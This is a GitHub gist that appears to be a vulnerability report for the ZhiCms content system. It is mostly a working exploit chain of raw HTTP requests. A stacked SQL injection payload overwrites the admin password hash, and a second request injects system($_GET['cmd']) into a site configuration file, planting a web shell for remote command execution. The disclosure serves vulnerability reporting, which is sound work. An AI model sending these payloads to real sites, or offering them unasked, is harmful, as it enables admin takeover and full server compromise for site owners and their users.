Skip to content

Instantly share code, notes, and snippets.

@L1nyz-tel

L1nyz-tel/READMD.md Secret

Last active March 27, 2024 02:44
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 to your computer and use it in GitHub Desktop.
Save L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 to your computer and use it in GitHub Desktop.
Download ZIP
ZhiCms CVE Report
Raw
READMD.md

source code in

In the function app/index/controller/mcontroller.php#getindexdata, there exists an SQL stack injection vulnerability that allows the execution of multiple SQL statements by using ; as a separator.

The following packet can be sent to reset the admin password to "admin":

POST /index.php?r=index/m/getindexdata HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 289
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://127.0.0.1:8888
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8888/index.php?r=manage/login/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=gclnhtp52rldnj5p9ckp389h2h
Connection: close

action=search&key=%2525%2527%253Bupdate%2520yun%255Fmanage%2520set%2520password%253D%2527bbe375100175e7b98339a98e0a07083b%2527%2520where%2520id%253D%25271%2527%253BSELECT%2520%252A%2520FROM%2520%2560yun%255Farticle%2560%2520%2520WHERE%2520%2560title%2560%2520LIKE%2520%2520%2527%2525&mall=

Subsequently, one can access the website's admin login page at [http://127.0.0.1:8888/index.php?r=manage/login/index] and log in using admin/admin to enter the backend.

Furthermore, in the function app/manage/controller/setcontroller.php#index, there exists a dangerous operation of PHP code concatenation writing to files.

The following packet can be sent to close the PHP code and write a Trojan:

POST /index.php?r=manage/set/index HTTP/1.1
Host: 127.0.0.1:8888
Content-Length: 229
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://127.0.0.1:8888
Referer: http://127.0.0.1:8888/index.php?r=manage/set/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=96d562012a5fde8577cbd6ea765d69ed
Connection: close

sitename=')%3Bsystem(%24_GET%5B'cmd'%5D)%3B%2F*&hosturl=&logo=public%2Fweb%2Fimages%2Flogoh2014r.png&ewm=public%2Fweb%2Fimages%2Flogoh2014r.png&appkey=&secretKey=&pid=&apiurl=https%3A%2F%2Fopen.push.red%2F&code=&zhuan=0&download=

Afterwards, accessing the malicious PHP file thus enables RCE!!!

http://127.0.0.1:8888/data/config/siteconfig.php?cmd=open -a Calculator
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment